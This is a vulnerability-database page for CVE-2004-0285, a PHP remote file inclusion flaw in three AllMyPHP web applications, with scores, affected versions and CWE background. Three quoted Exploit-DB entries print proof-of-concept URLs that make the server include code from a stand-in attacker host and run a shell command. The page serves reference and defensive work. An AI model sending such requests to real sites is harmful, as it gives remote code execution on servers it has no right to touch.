CVE-2004-0285
published 2004-11-23CVE-2004-0285: PHP remote file inclusion vulnerabilities in include/footer.inc.php in (1) AllMyVisitors, (2) AllMyLinks, and (3) AllMyGuests allow remote attackers to execute…
PriorityP337critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
7.79%
93.9th percentile
PHP remote file inclusion vulnerabilities in include/footer.inc.php in (1) AllMyVisitors, (2) AllMyLinks, and (3) AllMyGuests allow remote attackers to execute arbitrary PHP code via a URL in the _AMVconfig[cfg_serverpath] parameter.
Affected
13 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| allmyguests_project | allmyguests | — | — |
| allmyguests_project | allmyguests | — | — |
| allmyguests_project | allmyguests | — | — |
| allmyguests_project | allmyguests | — | — |
| allmylinks_project | allmylinks | — | — |
| allmylinks_project | allmylinks | — | — |
| allmylinks_project | allmylinks | — | — |
| allmylinks_project | allmylinks | — | — |
| allmylinks_project | allmylinks | — | — |
| allmylinks_project | allmylinks | — | — |
| allmylinks_project | allmylinks | — | — |
| allmyvisitors_project | allmyvisitors | — | — |
| allmyvisitors_project | allmyvisitors | — | — |
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
AllMyLinks 0.x - 'footer.inc.php' Arbitrary Code Execution
exploitdb·2004-02-16
CVE-2004-0285 AllMyLinks 0.x - 'footer.inc.php' Arbitrary Code Execution
AllMyLinks 0.x - 'footer.inc.php' Arbitrary Code Execution
---
source: https://www.securityfocus.com/bid/9664/info
Reportedly the AllMyPHP applications AllMyGuests, AllMyLinks and AllMyVisitors are prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call.
This issue may allow a remote attacker to execute arbitrary commands on the affected system with the privileges of the web server. Other attacks may be possible as well.
http://www.example.com/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.example.org/attacker.php/&cmd=uname%20-a
www.example.org/attacker.php' will contain:
Exploit-DB
AllMyGuests 0.x - 'info.inc.php' Arbitrary Code Execution
exploitdb·2004-02-16
CVE-2004-0285 AllMyGuests 0.x - 'info.inc.php' Arbitrary Code Execution
AllMyGuests 0.x - 'info.inc.php' Arbitrary Code Execution
---
source: https://www.securityfocus.com/bid/9664/info
Reportedly the AllMyPHP application AllMyGuests is prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call.
This issue may allow a remote attacker to execute arbitrary commands on the affected system with the privileges of the web server. Other attacks may be possible as well.
http://www.example.com/allmylinks/include/info.inc.php?_AMGconfig[cfg_serverpath]=http://www.example.org/attacker.php/&cmd=uname%20-a
www.example.org/attacker.php' will contain:
Exploit-DB
AllMyVisitors 0.x - 'info.inc.php' Arbitrary Code Execution
exploitdb·2004-02-16
CVE-2004-0285 AllMyVisitors 0.x - 'info.inc.php' Arbitrary Code Execution
AllMyVisitors 0.x - 'info.inc.php' Arbitrary Code Execution
---
source: https://www.securityfocus.com/bid/9664/info
Reportedly the AllMyPHP applications AllMyGuests, AllMyLinks and AllMyVisitors are prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call.
This issue may allow a remote attacker to execute arbitrary commands on the affected system with the privileges of the web server. Other attacks may be possible as well.
http://www.example.com/allmylinks/include/info.inc.php?_AMGconfig[cfg_serverpath]=http://www.example.org/attacker.php/&cmd=uname%20-a
www.example.org/attacker.php' will contain:
No writeups or analysis indexed.
CWE
Inclusion of Functionality from Untrusted Control Sphere
mitre_cwe
CWE-829 Inclusion of Functionality from Untrusted Control Sphere
CWE-829: Inclusion of Functionality from Untrusted Control Sphere
The product imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.
Modes of Introduction:
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Common Consequences:
Scope: Confidentiality, Integrity, Availability. Impact: Execute Unauthorized Code or Commands. An attacker could insert malicious functionality into the program by causing the program to download code that the attacker has placed into the untrusted control sphere, such as a malicious web site. This could enable the injection of malware, information exposure by granting excessive privileges or permissions to t
CWE
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
mitre_cwe
CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in "require," "include," or similar functions.
In certain versions and configurations of PHP, this can allow an attacker to specify a URL to a remote location from which the product will obtain the code to execute. In other cases in association with path traversal, the attacker can specify a local file that may contain executable statements that can be parsed by PHP.
Modes of Introduction:
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Common Consequences:
Scope:
http://marc.info/?l=bugtraq&m=107696209514155&w=2http://marc.info/?l=bugtraq&m=107696235424865&w=2http://marc.info/?l=bugtraq&m=107696291728750&w=2http://www.osvdb.org/6721http://www.securityfocus.com/bid/9664https://exchange.xforce.ibmcloud.com/vulnerabilities/15226https://exchange.xforce.ibmcloud.com/vulnerabilities/15227https://exchange.xforce.ibmcloud.com/vulnerabilities/15228http://marc.info/?l=bugtraq&m=107696209514155&w=2http://marc.info/?l=bugtraq&m=107696235424865&w=2http://marc.info/?l=bugtraq&m=107696291728750&w=2http://www.osvdb.org/6721http://www.securityfocus.com/bid/9664https://exchange.xforce.ibmcloud.com/vulnerabilities/15226https://exchange.xforce.ibmcloud.com/vulnerabilities/15227https://exchange.xforce.ibmcloud.com/vulnerabilities/15228
2004-11-23
Published